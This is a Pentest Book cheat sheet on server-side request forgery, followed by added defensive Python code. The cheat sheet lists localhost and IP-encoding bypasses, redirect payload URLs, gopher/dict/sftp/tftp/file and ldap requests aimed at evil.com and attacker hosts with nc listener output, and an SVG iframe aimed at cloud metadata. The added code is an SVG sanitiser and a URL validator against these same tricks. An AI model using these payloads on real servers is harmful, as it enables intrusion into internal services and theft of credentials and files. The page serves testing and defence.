Pentest Book
SSRF

Tools

```
# https://github.com/tarunkant/Gopherus
gopherus --exploit [PLATFORM]
# https://github.com/daeken/SSRFTest
# https://github.com/jmdx/TLS-poison/
# https://github.com/m4ll0k/Bug-Bounty-Toolz
# https://github.com/cujanovic/SSRF-Testing
# https://github.com/bcoles/ssrf_proxy

gau domain.com | python3 ssrf.py collab.listener.com

# https://github.com/micha3lb3n/SSRFire
./ssrfire.sh -d domain.com -s yourserver.com -f /path/to/copied_raw_urls.txt

# SSRF Redirect Payload generator
# https://tools.intigriti.io/redirector/
```

Summary

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.
```
# Web app requesting other IPs or ports, e.g. 127.0.0.1:8080 or 192.168.0.1
chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000
GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1
```

SSRF Attacks

```
# Check if you're able to enum IP or ports
127.0.0.1
127.0.1
127.1
127.000.000.001
2130706433
0x7F.0x00.0x00.0x01
0x7F.1
0x7F000001

# Quick URL based bypasses:
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/

# 301 responses:
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg

# 301 json:
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json

# 301 csv:
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv

# 301 xml:
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml

# 301 pdf:
https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf

# 30x custom:
https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json

# 20x custom:
https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json

# 201 custom:
https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json

# HTML iframe + URL bypass
http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/

# SFTP
http://whatever.com/ssrf.php?url=sftp://evil.com:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
SSH-2.0-libssh2_1.4.2

# Dict
http://safebuff.com/ssrf.php?dict://attacker:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
CLIENT libcurl 7.40.0

# gopher
# http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php
<?php
header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
?>

evil.com:# nc -v -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
HI
Multiline
test

# TFTP
# http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

evil.com:# nc -v -u -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
TESTUDPPACKEToctettsize0blksize512timeout6

# file
http://safebuff.com/redirect.php?url=file:///etc/passwd

# ldap
http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit

# SSRF Bypasses
?url=http://safesite.com&site.com
?url=http://////////////site.com/
?url=http://[email protected]/account/edit.aspx
?url=http://site.com/account/edit.aspx
?url=http://safesite.com?.site.com
?url=http://safesite.com#.site.com
?url=http://safesite.com\.site.com/domain
?url=https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
?url=https://192.10.10.3/
?url=https://192.10.10.2?.192.10.10.3/
?url=https://192.10.10.2#.192.10.10.3/
?url=https://192.10.10.2\.192.10.10.3/
?url=http://127.0.0.1/status/
?url=http://localhost:8000/status/
?url=http://site.com/domain.php
<?php
header('Location: http://127.0.0.1:8080/status');
?>

# Localhost bypasses
0
127.00.1
127.0.01
0.00.0
0.0.00
127.1.0.1
127.10.1
127.1.01
0177.1
0177.0001.0001
0x0.0x0.0x0.0x0
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1

# Blind SSRF
- Review Forms
- Contact Us
- Password fields
- Contact or profile info (Names, Addresses)
- User Agent

# SSRF through video upload
# https://hackerone.com/reports/1062888
# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS

# SSRF in pdf rendering
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="highcharts-root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
```
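
The SVG above only works because the server-side renderer honours the `<foreignObject>` and the XHTML `<iframe>` nested inside it. As an added, defensive example that is not part of the Pentest Book, the following Python sanitiser strips those constructs, together with resource attributes (`href`, `xlink:href`, `src`), `on*` handlers and `url()`/`@import` styles, from user-supplied SVG before it reaches a renderer. `sanitize_svg()`, `BLOCKED_ELEMENTS`, `BLOCKED_ATTRIBUTES` and the `SAMPLE_SVG` input are names and data invented here.

```python
# Added example (not code from the Pentest Book): strip, from a user-supplied
# SVG, the constructs that make a headless PDF renderer issue its own requests.
# sanitize_svg(), BLOCKED_ELEMENTS, BLOCKED_ATTRIBUTES and SAMPLE_SVG are invented here.
import xml.etree.ElementTree as ET

# Elements that embed another document, a script, or a fetched resource.
# foreignObject is the one that lets the chart SVG above carry an XHTML <iframe>.
BLOCKED_ELEMENTS = {"foreignobject", "script", "iframe", "object", "embed",
                    "image", "feimage", "use", "a"}
# Attributes that name a resource to load; compared by local name, so both
# href and xlink:href are caught.
BLOCKED_ATTRIBUTES = {"href", "src"}


def _local(name):
    """'{http://www.w3.org/2000/svg}foreignObject' -> 'foreignobject'.
    Lower-cased on purpose: HTML-mode parsers in renderers are case-tolerant."""
    return name.rpartition("}")[2].lower()


def sanitize_svg(svg_text):
    """Return the SVG as a string with blocked elements (and their subtrees),
    resource attributes, on* handlers and url()/@import styles removed."""
    if "<!DOCTYPE" in svg_text or "<!ENTITY" in svg_text:
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("root element must be <svg>")
    # Collect first, then remove: never mutate a tree while iter() walks it.
    doomed = [(parent, child) for parent in root.iter()
              for child in parent if _local(child.tag) in BLOCKED_ELEMENTS]
    for parent, child in doomed:
        parent.remove(child)
    for element in root.iter():
        for attr, value in list(element.attrib.items()):
            name = _local(attr)
            lowered = value.lower()
            if name in BLOCKED_ATTRIBUTES or name.startswith("on") or (
                    name == "style" and ("url(" in lowered or "@import" in lowered)):
                del element.attrib[attr]
    return ET.tostring(root, encoding="unicode")


# Constructed sample: the chart-style SVG from the page with a plain <rect> and
# a styled <text> added so the output shows what survives sanitisation.
SAMPLE_SVG = """<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
<rect x="0" y="0" width="10" height="10" fill="red" onload="alert(1)"/>
<text x="5" y="5" style="font-size:12px; fill:url(http://169.254.169.254/)">Q1</text>
</g>
</svg>"""

if __name__ == "__main__":
    print(sanitize_svg(SAMPLE_SVG))
```

Treat this as defence in depth rather than the fix: the renderer process itself should have no network route to 169.254.169.254 or to internal services, because any parser differential between this sanitiser and the renderer's own HTML parser would otherwise turn back into the SSRF shown above.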
SSRF Bypasses

```
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://%73%68%6d%69%6c%6f%6e%2e%63%6f%6d
http://////////////site.com/
http://0000::1:80/
http://000330.0000072.0000326.00000343
http://000NaN.000NaN
http://0177.00.00.01
http://017700000001
http://0330.072.0326.0343
http://033016553343
http://0NaN
http://0NaN.0NaN
http://0x0NaN0NaN
http://0x7f000001/
http://0xd8.0x3a.0xd6.0xe3
http://0xd8.0x3a.0xd6e3
http://0xd8.0x3ad6e3
http://0xd83ad6e3
http://0xNaN.0xaN0NaN
http://0xNaN.0xNa0x0NaN
http://0xNaN.0xNaN
http://127.0.0.1/status/
http://127.1/
http://2130706433/
http://216.0x3a.00000000326.0xe3
http://3627734755
http://[::]:80/
http://localhost:8000/status/
http://NaN
http://safesite.com#.site.com
http://safesite.com&site.com
http://safesite.com?.site.com
http://safesite.com\.site.com/domain
http://shmilon.0xNaN.undefined.undefined
http://site.com/account/edit.aspx
http://site.com/domain.php
http://[email protected]/account/edit.aspx
https://192.10.10.2#.192.10.10.3/
https://192.10.10.2?.192.10.10.3/
https://192.10.10.2\.192.10.10.3/
https://192.10.10.3/
https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
<?php
header('Location: http://127.0.0.1:8080/status');
?>

# Tool
# https://h.43z.one/ipconverter/
```
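
Everything catalogued on this page, from the `link=http://127.0.0.1:3000` request in the Summary through the octal, hex and decimal address forms, the gopher/dict/sftp/tftp/file/ldap handlers, the 301 redirect chains, and the `@`, `#`, `\` and ⓈⒾⓉⒺ.ⓒⓞⓜ host tricks, is what a server-side fetch has to reject. The Python below is an added example written for this page, not code from the Pentest Book or from any tool it links: one validator that canonicalises the host the way a libc resolver would (so `127.1`, `0177.1` and `2130706433` all become 127.0.0.1 before the check), refuses every non-public address a name resolves to, and re-validates each redirect hop instead of letting the HTTP client follow redirects blindly. `validate_url()`, `is_safe_url()`, `literal_address()`, `fetch_for_user()`, `SafeFetchError` and the `DEMO_DNS` table (constructed addresses, not real hosts) are assumptions introduced here; the resolver and the sender are injectable so the demo runs offline.

```python
# Added example (not code from the Pentest Book): a "fetch this URL for the
# user" helper hardened against the payload shapes catalogued on this page.
# validate_url(), is_safe_url(), literal_address(), fetch_for_user(),
# SafeFetchError and DEMO_DNS are invented here; resolver and sender are injectable.
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # no gopher/dict/sftp/tftp/file/ldap
MAX_REDIRECTS = 3

# Constructed DNS table for the offline demo (not real hosts or addresses).
DEMO_DNS = {"public.example": ["93.184.216.34"], "internal.example": ["10.0.0.5"]}

class SafeFetchError(Exception):
    """The URL, or a redirect it led to, points somewhere we must not fetch."""

def canonical_host(host):
    """Lower-case + IDNA-encode so look-alikes (ⓈⒾⓉⒺ.ⓒⓞⓜ) compare as ASCII."""
    return host.encode("idna").decode("ascii").lower()

def literal_address(host):
    """Return the address if `host` is any literal a libc resolver accepts
    (127.1, 0177.1, 0x7f.1, 2130706433, 127.000.000.001, ::1 ...), else None."""
    try:   # legacy 1/2/3-part, octal and hex forms, exactly as inet_aton reads them
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        pass
    try:   # strict dotted-quad and IPv6 (bracketed [::1] arrives unbracketed here)
        return ipaddress.ip_address(host)
    except ValueError:
        return None

def is_allowed_address(ip):
    """Only globally routable unicast: rejects loopback, RFC 1918, link-local
    (169.254.169.254 metadata), CGNAT, reserved and unspecified (0.0.0.0, ::)."""
    mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:127.0.0.1 is still loopback
    if mapped is not None:
        ip = mapped
    return ip.is_global and not ip.is_multicast

def validate_url(url, resolver):
    """Raise SafeFetchError unless scheme, host and EVERY resolved address pass."""
    try:
        parts = urlsplit(url)
        parts.port                                    # "0000::1:80" -> ValueError
        host = canonical_host(parts.hostname or "")   # .hostname drops user:pw@ and [ ]
    except (ValueError, UnicodeError):
        raise SafeFetchError("malformed URL: %r" % url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise SafeFetchError("scheme not allowed: %r" % parts.scheme)
    if not host or "\\" in host:                      # empty authority, or the a\.b trick
        raise SafeFetchError("suspicious host: %r" % host)
    ip = literal_address(host)
    if ip is not None:
        addresses = [ip]
    else:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except (ValueError, OSError):                 # NXDOMAIN, scoped IPv6, ...
            addresses = []
    if not addresses or not all(is_allowed_address(a) for a in addresses):
        raise SafeFetchError("non-public destination: %r" % host)

def is_safe_url(url, resolver):
    try:
        validate_url(url, resolver)
        return True
    except SafeFetchError:
        return False

def _send_without_redirects(url):
    """Default sender: one request; a redirect comes back as (status, headers, b'')."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None
    try:
        with urllib.request.build_opener(NoRedirect).open(url, timeout=5) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, b""

def fetch_for_user(url, resolver=None, send=None):
    """Fetch on the user's behalf, re-validating every redirect hop: the 301
    chains above pass a first-hop check and then land on 169.254.169.254."""
    resolver = resolver or (lambda h: [ai[4][0] for ai in socket.getaddrinfo(h, None)])
    send = send or _send_without_redirects
    for _ in range(MAX_REDIRECTS + 1):
        validate_url(url, resolver)
        status, headers, body = send(url)
        if status not in (301, 302, 303, 307, 308):
            return status, body
        url = urljoin(url, headers.get("location", ""))   # relative Location too
    raise SafeFetchError("too many redirects")

if __name__ == "__main__":
    resolve = lambda h: DEMO_DNS.get(h, [])
    for u in ["https://public.example/", "http://127.1/", "http://0x7F000001/",
              "http://public.example@internal.example/", "gopher://public.example/_x"]:
        print("%-42s %s" % (u, "allowed" if is_safe_url(u, resolve) else "BLOCKED"))
```

The gap this leaves is DNS rebinding: validating first and then letting the HTTP client resolve the name a second time gives an attacker-controlled resolver a window to answer with an internal address. Closing it means resolving once and connecting to that pinned address (keeping the Host header and TLS SNI on the original name), or running the same check inside the client's connect hook; egress rules on the fetching host are the backstop in either design.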

Mindmap
